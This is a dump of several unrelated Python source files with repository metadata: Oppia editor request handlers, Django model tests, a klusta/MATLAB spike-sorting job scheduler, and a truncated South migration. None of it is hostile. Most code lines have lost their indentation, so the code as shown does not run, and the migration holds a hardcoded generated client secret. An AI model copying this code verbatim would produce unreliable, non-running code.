exploration = exp_services.get_exploration_by_id(exploration_id)
can_delete = rights_manager.Actor(self.user_id).can_delete(
exploration.id)
if not can_delete:
raise self.UnauthorizedUserException(
'User %s does not have permissions to delete exploration %s' %
(self.user_id, exploration_id))
is_exploration_cloned = rights_manager.is_exploration_cloned(
exploration_id)
exp_services.delete_exploration(
self.user_id, exploration_id, force_deletion=is_exploration_cloned)
logging.info(
'%s %s deleted exploration %s' %
(role, self.user_id, exploration_id))
class ExplorationRightsHandler(EditorHandler):
"""Handles management of exploration editing rights."""
PAGE_NAME_FOR_CSRF = 'editor'
@require_editor
def put(self, exploration_id):
"""Updates the editing rights for the given exploration."""
exploration = exp_services.get_exploration_by_id(exploration_id)
version = self.payload.get('version')
_require_valid_version(version, exploration.version)
is_public = self.payload.get('is_public')
is_publicized = self.payload.get('is_publicized')
is_community_owned = self.payload.get('is_community_owned')
new_member_username = self.payload.get('new_member_username')
new_member_role = self.payload.get('new_member_role')
viewable_if_private = self.payload.get('viewable_if_private')
if new_member_username:
if not rights_manager.Actor(self.user_id).can_modify_roles(
exploration_id):
raise self.UnauthorizedUserException(
'Only an owner of this exploration can add or change '
'roles.')
new_member_id = user_services.get_user_id_from_username(
new_member_username)
if new_member_id is None:
raise Exception(
'Sorry, we could not find the specified user.')
rights_manager.assign_role(
self.user_id, exploration_id, new_member_id, new_member_role)
elif is_public is not None:
exploration = exp_services.get_exploration_by_id(exploration_id)
if is_public:
try:
exploration.validate(strict=True)
except utils.ValidationError as e:
raise self.InvalidInputException(e)
rights_manager.publish_exploration(
self.user_id, exploration_id)
exp_services.index_explorations_given_ids([exploration_id])
else:
rights_manager.unpublish_exploration(
self.user_id, exploration_id)
exp_services.delete_documents_from_search_index([
exploration_id])
elif is_publicized is not None:
exploration = exp_services.get_exploration_by_id(exploration_id)
if is_publicized:
try:
exploration.validate(strict=True)
except utils.ValidationError as e:
raise self.InvalidInputException(e)
rights_manager.publicize_exploration(
self.user_id, exploration_id)
else:
rights_manager.unpublicize_exploration(
self.user_id, exploration_id)
elif is_community_owned:
exploration = exp_services.get_exploration_by_id(exploration_id)
try:
exploration.validate(strict=True)
except utils.ValidationError as e:
raise self.InvalidInputException(e)
rights_manager.release_ownership(self.user_id, exploration_id)
elif viewable_if_private is not None:
rights_manager.set_private_viewability(
self.user_id, exploration_id, viewable_if_private)
else:
raise self.InvalidInputException(
'No change was made to this exploration.')
self.render_json({
'rights': rights_manager.get_exploration_rights(
exploration_id).to_dict()
})
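    # Illustrative PUT payloads (all values hypothetical): sending
    # {'version': 3, 'is_public': True} publishes the exploration, while
    # {'version': 3, 'new_member_username': 'alice', 'new_member_role': 'editor'}
    # assigns a role; 'editor' here stands in for whichever role strings
    # rights_manager actually defines.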
class ResolvedAnswersHandler(EditorHandler):
"""Allows learners' answers for a state to be marked as resolved."""
PAGE_NAME_FOR_CSRF = 'editor'
@require_editor
def put(self, exploration_id, state_name):
"""Marks learners' answers as resolved."""
resolved_answers = self.payload.get('resolved_answers')
if not isinstance(resolved_answers, list):
raise self.InvalidInputException(
'Expected a list of resolved answers; received %s.' %
resolved_answers)
if 'resolved_answers' in self.payload:
event_services.DefaultRuleAnswerResolutionEventHandler.record(
exploration_id, state_name, 'submit', resolved_answers)
self.render_json({})
class ExplorationDownloadHandler(EditorHandler):
"""Downloads an exploration as a zip file, or dict of YAML strings
representing states."""
def get(self, exploration_id):
"""Handles GET requests."""
try:
exploration = exp_services.get_exploration_by_id(exploration_id)
        except Exception:
raise self.PageNotFoundException
version = self.request.get('v', default_value=exploration.version)
output_format = self.request.get('output_format', default_value='zip')
width = int(self.request.get('width', default_value=80))
        # The filename uses the exploration's current title, so any rename is
        # reflected in the downloaded file's name.
filename = 'oppia-%s-v%s' % (
utils.to_ascii(exploration.title.replace(' ', '')), version)
if output_format == feconf.OUTPUT_FORMAT_ZIP:
self.response.headers['Content-Type'] = 'text/plain'
self.response.headers['Content-Disposition'] = (
'attachment; filename=%s.zip' % str(filename))
self.response.write(
exp_services.export_to_zip_file(exploration_id, version))
elif output_format == feconf.OUTPUT_FORMAT_JSON:
self.render_json(exp_services.export_states_to_yaml(
exploration_id, version=version, width=width))
else:
raise self.InvalidInputException(
'Unrecognized output format %s' % output_format)
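    # Illustrative query string (values hypothetical): appending
    # '?v=2&output_format=json&width=60' to the request returns each state's
    # YAML representation wrapped in JSON instead of a zip attachment.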
class StateDownloadHandler(EditorHandler):
"""Downloads a state as a YAML string."""
def get(self, exploration_id):
"""Handles GET requests."""
try:
exploration = exp_services.get_exploration_by_id(exploration_id)
        except Exception:
raise self.PageNotFoundException
version = self.request.get('v', default_value=exploration.version)
width = int(self.request.get('width', default_value=80))
try:
state = self.request.get('state')
        except Exception:
raise self.InvalidInputException('State not found')
exploration_dict = exp_services.export_states_to_yaml(
exploration_id, version=version, width=width)
if state not in exploration_dict:
raise self.PageNotFoundException
self.response.write(exploration_dict[state])
class ExplorationResourcesHandler(EditorHandler):
"""Manages assets associated with an exploration."""
@require_editor
def get(self, exploration_id):
"""Handles GET requests."""
fs = fs_domain.AbstractFileSystem(
fs_domain.ExplorationFileSystem(exploration_id))
dir_list = fs.listdir('')
self.render_json({'filepaths': dir_list})
class ExplorationSnapshotsHandler(EditorHandler):
"""Returns the exploration snapshot history."""
def get(self, exploration_id):
"""Handles GET requests."""
try:
snapshots = exp_services.get_exploration_snapshots_metadata(
exploration_id)
        except Exception:
raise self.PageNotFoundException
# Patch `snapshots` to use the editor's display name.
for snapshot in snapshots:
if snapshot['committer_id'] != feconf.ADMIN_COMMITTER_ID:
snapshot['committer_id'] = user_services.get_username(
snapshot['committer_id'])
self.render_json({
'snapshots': snapshots,
})
class ExplorationRevertHandler(EditorHandler):
"""Reverts an exploration to an older version."""
@require_editor
def post(self, exploration_id):
"""Handles POST requests."""
current_version = self.payload.get('current_version')
revert_to_version = self.payload.get('revert_to_version')
if not isinstance(revert_to_version, int):
raise self.InvalidInputException(
'Expected an integer version to revert to; received %s.' %
revert_to_version)
if not isinstance(current_version, int):
raise self.InvalidInputException(
'Expected an integer current version; received %s.' %
current_version)
if revert_to_version < 1 or revert_to_version >= current_version:
raise self.InvalidInputException(
'Cannot revert to version %s from version %s.' %
(revert_to_version, current_version))
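        # Example with hypothetical numbers: if current_version is 7, any
        # revert_to_version from 1 through 6 inclusive passes this check.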
exp_services.revert_exploration(
self.user_id, exploration_id, current_version, revert_to_version)
self.render_json({})
class ExplorationStatisticsHandler(EditorHandler):
"""Returns statistics for an exploration."""
def get(self, exploration_id, exploration_version):
"""Handles GET requests."""
try:
exp_services.get_exploration_by_id(exploration_id)
        except Exception:
raise self.PageNotFoundException
self.render_json(stats_services.get_exploration_stats(
exploration_id, exploration_version))
class ExplorationStatsVersionsHandler(EditorHandler):
"""Returns statistics versions for an exploration."""
def get(self, exploration_id):
"""Handles GET requests."""
try:
exp_services.get_exploration_by_id(exploration_id)
        except Exception:
raise self.PageNotFoundException
self.render_json({
'versions': stats_services.get_versions_for_exploration_stats(
exploration_id)})
class StateRulesStatsHandler(EditorHandler):
"""Returns detailed learner answer statistics for a state."""
def get(self, exploration_id, escaped_state_name):
"""Handles GET requests."""
try:
exploration = exp_services.get_exploration_by_id(exploration_id)
        except Exception:
raise self.PageNotFoundException
state_name = self.unescape_state_name(escaped_state_name)
if state_name not in exploration.states:
logging.error('Could not find state: %s' % state_name)
logging.error('Available states: %s' % exploration.states.keys())
raise self.PageNotFoundException
self.render_json({
'rules_stats': stats_services.get_state_rules_stats(
exploration_id, state_name)
})
class ImageUploadHandler(EditorHandler):
"""Handles image uploads."""
@require_editor
def post(self, exploration_id):
"""Saves an image uploaded by a content creator."""
raw = self.request.get('image')
filename = self.payload.get('filename')
if not raw:
raise self.InvalidInputException('No image supplied')
file_format = imghdr.what(None, h=raw)
if file_format not in feconf.ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS:
allowed_formats = ', '.join(
feconf.ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS.keys())
raise Exception('Image file not recognized: it should be in '
'one of the following formats: %s.' %
allowed_formats)
if not filename:
raise self.InvalidInputException('No filename supplied')
if '/' in filename or '..' in filename:
raise self.InvalidInputException(
'Filenames should not include slashes (/) or consecutive dot '
'characters.')
if '.' in filename:
dot_index = filename.rfind('.')
primary_name = filename[:dot_index]
extension = filename[dot_index + 1:].lower()
if (extension not in
feconf.ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS[file_format]):
raise self.InvalidInputException(
'Expected a filename ending in .%s; received %s' %
(file_format, filename))
else:
primary_name = filename
filepath = '%s.%s' % (primary_name, file_format)
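        # For illustration (hypothetical values): an upload named 'photo.PNG'
        # detected as 'png' yields primary_name 'photo' and filepath
        # 'photo.png'; a bare 'photo' also becomes 'photo.png'.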
fs = fs_domain.AbstractFileSystem(
fs_domain.ExplorationFileSystem(exploration_id))
if fs.isfile(filepath):
raise self.InvalidInputException(
'A file with the name %s already exists. Please choose a '
'different name.' % filepath)
fs.commit(self.user_id, filepath, raw)
self.render_json({'filepath': filepath})
class ChangeListSummaryHandler(EditorHandler):
"""Returns a summary of a changelist applied to a given exploration."""
@require_editor
def post(self, exploration_id):
"""Handles POST requests."""
change_list = self.payload.get('change_list')
version = self.payload.get('version')
current_exploration = exp_services.get_exploration_by_id(
exploration_id)
if version != current_exploration.version:
# TODO(sll): Improve this.
self.render_json({
'error': (
'Sorry! Someone else has edited and committed changes to '
'this exploration while you were editing it. We suggest '
'opening another browser tab -- which will load the new '
'version of the exploration -- then transferring your '
'changes there. We will try to make this easier in the '
'future -- we have not done it yet because figuring out '
'how to merge different people\'s changes is hard. '
'(Trying to edit version %s, but the current version is '
'%s.).' % (version, current_exploration.version)
)
})
else:
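            # '$$hashKey' is tracking metadata that AngularJS adds to
            # objects it repeats over in the frontend, so it must be
            # stripped before the change list is processed.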
utils.recursively_remove_key(change_list, '$$hashKey')
summary = exp_services.get_summary_of_change_list(
current_exploration, change_list)
updated_exploration = exp_services.apply_change_list(
exploration_id, change_list)
warning_message = ''
try:
updated_exploration.validate(strict=True)
except utils.ValidationError as e:
warning_message = unicode(e)
self.render_json({
'summary': summary,
'warning_message': warning_message
})
class StartedTutorialEventHandler(EditorHandler):
"""Records that this user has started the state editor tutorial."""
def post(self, exploration_id):
"""Handles GET requests."""
user_services.record_user_started_state_editor_tutorial(self.user_id)
| infinyte/oppia | core/controllers/editor.py | Python | apache-2.0 | 29,703 |
# -*- coding: utf-8 -*-
# Copyright 2013 Dev in Cachu authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import unittest
from django.db import models as django_models
from .. import models
class ModelPalestranteTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.field_names = models.Palestrante._meta.get_all_field_names()
def test_model_palestrante_deve_ter_nome(self):
self.assertIn("nome", self.field_names)
def test_campo_nome_deve_ser_CharField(self):
field = models.Palestrante._meta.get_field_by_name("nome")[0]
self.assertIsInstance(field, django_models.CharField)
def test_campo_nome_nao_deve_aceitar_blank(self):
field = models.Palestrante._meta.get_field_by_name("nome")[0]
self.assertFalse(field.blank)
def test_campo_nome_deve_ter_no_maximo_100_caracteres(self):
field = models.Palestrante._meta.get_field_by_name("nome")[0]
self.assertEqual(100, field.max_length)
def test_model_palestrante_deve_ter_slug(self):
self.assertIn("slug", self.field_names)
def test_campo_slug_deve_ser_SlugField(self):
field = models.Palestrante._meta.get_field_by_name("slug")[0]
self.assertIsInstance(field, django_models.SlugField)
def test_campo_slug_nao_deve_aceitar_blank(self):
field = models.Palestrante._meta.get_field_by_name("slug")[0]
self.assertFalse(field.blank)
def test_campo_slug_deve_ter_no_maximo_100_caracteres(self):
field = models.Palestrante._meta.get_field_by_name("slug")[0]
self.assertEqual(100, field.max_length)
def test_campo_slug_deve_ser_unico(self):
field = models.Palestrante._meta.get_field_by_name("slug")[0]
self.assertTrue(field.unique)
def test_model_palestrante_deve_ter_campo_para_perfil_no_twitter(self):
self.assertIn("twitter", self.field_names)
def test_campo_twitter_deve_ser_CharField(self):
field = models.Palestrante._meta.get_field_by_name("twitter")[0]
self.assertIsInstance(field, django_models.CharField)
def test_campo_twitter_deve_aceitar_blank(self):
field = models.Palestrante._meta.get_field_by_name("twitter")[0]
self.assertIsInstance(field, django_models.CharField)
self.assertTrue(field.blank)
def test_campo_twitter_deve_ter_no_maximo_50_caracteres(self):
field = models.Palestrante._meta.get_field_by_name("twitter")[0]
self.assertEqual(50, field.max_length)
def test_model_palestrante_deve_ter_campo_para_minicurriculo(self):
self.assertIn("minicurriculo", self.field_names)
def test_campo_minicurriculo_deve_ser_CharField(self):
field = models.Palestrante._meta.get_field_by_name("minicurriculo")[0]
self.assertIsInstance(field, django_models.CharField)
def test_campo_minicurriculo_nao_deve_aceitar_blank(self):
field = models.Palestrante._meta.get_field_by_name("minicurriculo")[0]
self.assertFalse(field.blank)
def test_campo_minicurriculo_deve_ter_no_maximo_1000_caracteres(self):
field = models.Palestrante._meta.get_field_by_name("minicurriculo")[0]
self.assertEqual(1000, field.max_length)
def test_palestrante_deve_ter_foto(self):
self.assertIn("foto", self.field_names)
def test_campo_foto_deve_ser_do_tipo_ImageField(self):
field = models.Palestrante._meta.get_field_by_name("foto")[0]
self.assertIsInstance(field, django_models.ImageField)
def test_campo_foto_deve_enviar_fotos_para_diretorio_palestrantes(self):
field = models.Palestrante._meta.get_field_by_name("foto")[0]
self.assertEqual("palestrantes", field.upload_to)
def test_campo_foto_nao_deve_aceitar_blank(self):
field = models.Palestrante._meta.get_field_by_name("foto")[0]
self.assertFalse(field.blank)
def test_palestrante_deve_ter_flag_de_listagem_na_pagina(self):
self.assertIn("listagem", self.field_names)
def test_flag_de_listagem_deve_ser_do_tipo_boolean(self):
field = models.Palestrante._meta.get_field_by_name("listagem")[0]
self.assertIsInstance(field, django_models.BooleanField)
def test_flag_de_listagem_deve_ter_verbose_name_bonitinho(self):
field = models.Palestrante._meta.get_field_by_name("listagem")[0]
self.assertEqual(u"Exibir na página de palestrantes?",
field.verbose_name)
def test_flag_de_listagem_deve_vir_desmarcado_por_padrao(self):
field = models.Palestrante._meta.get_field_by_name("listagem")[0]
self.assertEqual(False, field.default)
def test_repr_deve_conter_nome_do_palestrante(self):
esperado = "<Palestrante: \"Francisco Souza\">"
palestrante = models.Palestrante(nome="Francisco Souza")
self.assertEqual(esperado, repr(palestrante))
def test_unicode_deve_retornar_nome_do_palestrante(self):
palestrante = models.Palestrante(nome="Francisco Souza")
self.assertEqual("Francisco Souza", unicode(palestrante))
def test_str_deve_retornar_nome_do_palestrante(self):
palestrante = models.Palestrante(nome="Francisco Souza")
self.assertEqual("Francisco Souza", str(palestrante))
def test_deve_ter_campo_headline(self):
self.assertIn("headline", self.field_names)
def test_headline_deve_ser_do_tipo_CharField(self):
field = models.Palestrante._meta.get_field_by_name("headline")[0]
self.assertIsInstance(field, django_models.CharField)
def test_headline_deve_ser_obrigatorio(self):
field = models.Palestrante._meta.get_field_by_name("headline")[0]
self.assertFalse(field.blank)
self.assertFalse(field.null)
    def test_headline_deve_ter_no_maximo_60_caracteres(self):
field = models.Palestrante._meta.get_field_by_name("headline")[0]
self.assertEqual(60, field.max_length)
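# For orientation, a minimal sketch of the model these tests describe. This is
# an assumption reconstructed from the assertions above, not the project's
# actual models.py; unlisted options and field order are guesses.
#
#     class Palestrante(django_models.Model):
#         nome = django_models.CharField(max_length=100)
#         slug = django_models.SlugField(max_length=100, unique=True)
#         twitter = django_models.CharField(max_length=50, blank=True)
#         minicurriculo = django_models.CharField(max_length=1000)
#         foto = django_models.ImageField(upload_to="palestrantes")
#         headline = django_models.CharField(max_length=60)
#         listagem = django_models.BooleanField(
#             default=False,
#             verbose_name=u"Exibir na página de palestrantes?")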
| devincachu/devincachu-2014 | devincachu/palestras/tests/test_model_palestrante.py | Python | bsd-2-clause | 6,017 |
#!/home/david/miniconda/envs/klusta/bin/python
import psutil
import time
import subprocess
import os
import glob
import fnmatch
import socket
import shutil
import argparse
import xml.etree.ElementTree as ET
# import resample
# TODO
# - add behavior tracking extraction
# - add LFP extraction
ssdDirectory = '/home/david/to_cut/autoclustered/'
ssdCompName = 'hyperion'
def main(args):
    dataFolder = args.dataFolder  # directory with recording subdirectories
    numShanks = args.numShanks  # set this value to the number of shanks (spike groups) to cluster
    waitTime = args.waitTime  # time interval, in seconds, in between starting new extraction/clustering jobs
    numJobs = args.numJobs  # max number of jobs to run at once
    cpuLimit = args.cpuLimit  # max cpu usage allowed before starting new jobs
repoPath = args.repoPath
print('repo path is : ' + repoPath)
while True: # this is the song that never ends....
os.chdir(dataFolder)
print('searching for unprocessed recordings...')
for dirName, subdirList, fileList in os.walk(dataFolder):
for file in fileList:
# check that a .dat exists in this folder and matches the
# directory name
                if file.startswith(dirName.split('/')[-1]) and file.endswith(".dat"):
os.chdir(os.path.abspath(dirName)) # we are now in the recording session folder...
xmlfile = glob.glob("*xml")
extractLFP(dirName,file,xmlfile,repoPath) # if no LFP yet, we make one
# check if shank dirs exist and make them if they don't
checkShankDirsExist(subdirList, dirName, numShanks, xmlfile,repoPath)
for root, shankdirs, defaultFiles in os.walk(dirName):
for shank in shankdirs: # iterate through shank subdirectories
# if the shank hasn't already been clustered and its directory name is less than 3 characters
if not fnmatch.fnmatch(shank, '_klust*') and len(shank) < 3:
os.chdir(shank) # now in shank directory
for file in os.listdir('.'):
# double check there's a prm file
if fnmatch.fnmatch(file, '*.prm'):
# you shall not pass... until other
# jobs have finished.
checkJobLimits(cpuLimit, numJobs, waitTime)
# check that spike extraction hasn't
# been done
if not any(fnmatch.fnmatch(i, '*.kwik') for i in os.listdir('.')):
# startClusterJob(root, file)
print('do nothing')
# check if there is a log file
status = getFolderStatus()
startAutoClustering(shank, dirName,repoPath,status)
copyToSSD(
ssdCompName, ssdDirectory, root, shank, status)
os.chdir('..') # return to recording directory
time.sleep(waitTime) # it goes on and on my friends...
def getCurrentJobs():
    # process names that count as running extraction/clustering jobs;
    # "Klustakwik" is the upper-case variant seen on the servers
    job_names = {"phy", "klustakwik", "klusta", "Klustakwik", "MATLAB"}
    count = 0
    for proc in psutil.process_iter():
        if proc.name() in job_names:
            count += 1
    return count
def getFolderStatus():
klg = glob.glob('*.klg.*')
print(klg)
if len(klg) > 0:
        with open(klg[0], "rb") as f:
            if os.path.getsize(klg[0]) > 200:  # skip files too small to contain a status line
                f.seek(-2, 2)  # Jump to the second last byte.
                while f.read(1) != b"\n":  # Until EOL is found...
                    # ...jump back the read byte plus one more.
                    f.seek(-2, 1)
                last = f.readline().decode()  # Read last line as text.
                status = last.split(" ")[-1].split(".")[0]
                status = status.split("\n")[0]  # strip the trailing newline
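                # Hypothetical example: if the last .klg line read
                # 'Switched to final mode. finishing.', the splits above
                # would yield status 'finishing'.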
else:
status = ''
else:
status = ''
return status
def checkJobLimits(cpuLimit, numJobs, waitTime):
cpu = psutil.cpu_percent(2)
while cpu > cpuLimit:
print('current cpu usage: %f' % cpu)
# wait until resources are available
time.sleep(waitTime)
cpu = psutil.cpu_percent(2)
mem = psutil.virtual_memory() # samples virtual memory usage
while mem.percent > 97:
print('current memory usage: %f' % mem.percent)
# wait until resources are
# available
time.sleep(waitTime)
mem = psutil.virtual_memory()
while getCurrentJobs() >= numJobs:
print('waiting for %f jobs to finish...' % getCurrentJobs())
time.sleep(waitTime)
def checkShankDirsExist(subdirList, dirName, numShanks, xmlfile,repoPath):
try:
        subdirList = [d for d in subdirList if '201' not in d
                      if 'extras' not in d if 'temp' not in d
                      if 'Session' not in d if 'State' not in d]  # removes folders that are not shank folders
if len(subdirList) < numShanks:
            # this section needs to be abstracted to the number of
            # shanks instead of a hard number...
print(os.path.abspath(dirName))
matlab_command = ['matlab -nodesktop -r "addpath(genpath(\'' + repoPath + '\')); \
addpath(genpath(\'/ifs/home/dwt244/buzcode\')); \
makeProbeMap(\'' + os.path.abspath(dirName) + '\',\'' + xmlfile[0] + '\');exit"']
# generate folder structure and .prm/.prb files
print(matlab_command)
subprocess.call(matlab_command[0], shell=True)
time.sleep(10) # let the process get going...
return True
    except Exception:
        print('error while setting up shank directories')
        return False
def extractBehaviorTracking(xmlfile, repoPath):
    # checks if there is behavioral tracking data that needs to be synced to ephys data
    # eventually this will call Process_ConvertOptitrack2Behav.m or its
    # replacement
    if not os.path.isfile(xmlfile[0] + '.tracking.behavior.mat') and \
            (len(glob.glob('Session*')) > 0 or len(glob.glob('*.tak')) > 0):
        matlab_command = ['matlab -nodesktop -r "addpath(genpath(\'' + repoPath + '\')); \
                          Process_ConvertOptitrack2Behav(\'' + xmlfile[0] + '\');exit"']
        print(matlab_command)
        subprocess.call(matlab_command[0], shell=True)
def extractLFP(dirName,file,xmlfile,repoPath):
lfpFile = file.split('.')[0] + '.lfp'
# if not os.path.isfile(lfpFile): # check if LFP file exists...
# print('making LFP file for ' + os.getcwd())
# tree = ET.parse(dirName + '/' + xmlfile[0])
# root = tree.getroot()
# try:
# nChannels = int(root.find('acquisitionSystem').find('nChannels').text) # some very bad assumptions that your xml is formatted a la FMAToolbox....
# except (AttributeError):
# print('is your xml file formatted correctly? couldnt find nChannels....')
# resample.main(dirName,file,lfpFile,nChannels,20000,1250)
def startClusterJob(root, file):  # starts the spike extraction/clustering process using klusta
# if not socket.gethostname() == 'hyperion':
toRun = ['nohup klusta ' + file + ' &'] # create the klusta command to run
# run klusta job
subprocess.call(toRun[0], shell=True)
# add something here to write the computer name to the log file
f = open('complog.log', 'w')
f.write(socket.gethostname())
f.close()
print(['starting... ' + root + toRun[0]])
time.sleep(10) # let one process start before generating another
def startAutoClustering(shank, dirName,repoPath,status):
if any(fnmatch.fnmatch(status, p) for p in ['1000','abandoning', 'finishing']) and not os.path.exists("autoclustering.out"):
# check Klustakwik has finished
print(os.getcwd())
print('starting autoclustering on ' + shank + ' ..')
with open("autoclustering.out", "wb") as myfile:
myfile.write("autoclustering in progress\n")
runAutoClust = ['matlab -nodesktop -r "addpath(genpath(\'' + repoPath + '\'));'
' AutoClustering(\'' + dirName.split('/')[-1] + '\', ' + shank + ');exit"']
# making this a check_call forces matlab to complete before going to
# the next job (only one autoclustering job runs at a time)
subprocess.check_call(runAutoClust, shell=True)
def copyToSSD(ssdCompName, ssdDirectory, root, shank, status): # copies finished shanks to a SSD for manual spike sorting
if fnmatch.fnmatch(status, 'autoclustered') and socket.gethostname() == 'hyperion' and os.path.exists("autoclustering.out"):
        # checks that AutoClustering is done
print('copying ' + root + '/' + shank +
' to SSD and removing progress logfile..')
os.remove("autoclustering.out")
try:
shutil.copytree(root + '/' + shank, ssdDirectory +
root.split('/')[-2] + '/' + root.split('/')[-1] + '/' + shank)
except:
print('file exists already... not copying anything.')
# copy files to SSD
with open("nohup.out", "a") as myfile:
myfile.write("copied to SSD\n")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='This function is designed to run '\
'in the background on a data processing '\
'machine. It constantly searches through '\
'a given directory [arg1] and starts extract,'\
' clustering, and other processing jobs')
parser.add_argument('dataFolder',type=str,default=os.getcwd(),help='the folder with all of your recordings in subdirectories')
    parser.add_argument('numShanks',type=int,default=10,help='number of shanks to process')
    parser.add_argument('-waitTime',type=int,default=300,help='time (seconds) to wait before searching for more jobs [default = 300]')
    parser.add_argument('-numJobs',type=int,default=4,help='number of jobs to run simultaneously [default = 4]')
    parser.add_argument('-cpuLimit',type=float,default=100,help='cpu usage limit [default = 100]')
parser.add_argument('-repoPath',type=str,default=os.getcwd(),help='location of ephys-processing repository')
args = parser.parse_args()
main(args)
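# Example invocation (hypothetical paths and values):
#   python processRecordings.py /data/recordings 10 -waitTime 120 -numJobs 2 \
#       -cpuLimit 80 -repoPath /home/david/ephys-processing-pipeline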
| DavidTingley/ephys-processing-pipeline | processRecordings.py | Python | gpl-3.0 | 11,099 |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Removing unique constraint on 'NetworkInterface', fields ['name']
db.delete_unique(u'storageadmin_networkinterface', ['name'])
# Changing field 'NetworkInterface.autoconnect'
db.alter_column(u'storageadmin_networkinterface', 'autoconnect', self.gf('django.db.models.fields.CharField')(max_length=8, null=True))
# Changing field 'NetworkInterface.name'
db.alter_column(u'storageadmin_networkinterface', 'name', self.gf('django.db.models.fields.CharField')(max_length=100, null=True))
# Changing field 'NetworkInterface.method'
db.alter_column(u'storageadmin_networkinterface', 'method', self.gf('django.db.models.fields.CharField')(max_length=64, null=True))
def backwards(self, orm):
# Changing field 'NetworkInterface.autoconnect'
db.alter_column(u'storageadmin_networkinterface', 'autoconnect', self.gf('django.db.models.fields.CharField')(max_length=8))
# Changing field 'NetworkInterface.name'
db.alter_column(u'storageadmin_networkinterface', 'name', self.gf('django.db.models.fields.CharField')(default='yes', max_length=100, unique=True))
# Adding unique constraint on 'NetworkInterface', fields ['name']
db.create_unique(u'storageadmin_networkinterface', ['name'])
# Changing field 'NetworkInterface.method'
db.alter_column(u'storageadmin_networkinterface', 'method', self.gf('django.db.models.fields.CharField')(max_length=64))
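    # In short: forwards() relaxes NetworkInterface so 'autoconnect', 'method',
    # and 'name' (previously unique) become nullable, and backwards() restores
    # the original NOT NULL and unique constraints with their old defaults.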
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'oauth2_provider.application': {
'Meta': {'object_name': 'Application'},
'authorization_grant_type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'client_id': ('django.db.models.fields.CharField', [], {'default': "u'hi=@=iqhh!2krLl@rZ@dyzDSfWa?8wmA;_N1zTia'", 'unique': 'True', 'max_length': '100'}),
'client_secret': ('django.db.models.fields.CharField', [], {'default': "u's4i?Y35J2.4;jS@ubKN:KYN0?=hTb3Z95iOMKF=1a9tlQ0GyaFbgGW-X3;@F:zJCS-l8EXnPW:A9bPGEWXvKHBH3Mf8LBS@kHvppt2-c4_FAaNS;oDAXTNWUoBFWB?HH'", 'max_length': '255', 'blank': 'True'}),
'client_type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'redirect_uris': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'storageadmin.advancednfsexport': {
'Meta': {'object_name': 'AdvancedNFSExport'},
'export_str': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'storageadmin.apikeys': {
'Meta': {'object_name': 'APIKeys'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'user': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '8'})
},
'storageadmin.appliance': {
'Meta': {'object_name': 'Appliance'},
'client_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'client_secret': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'current_appliance': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
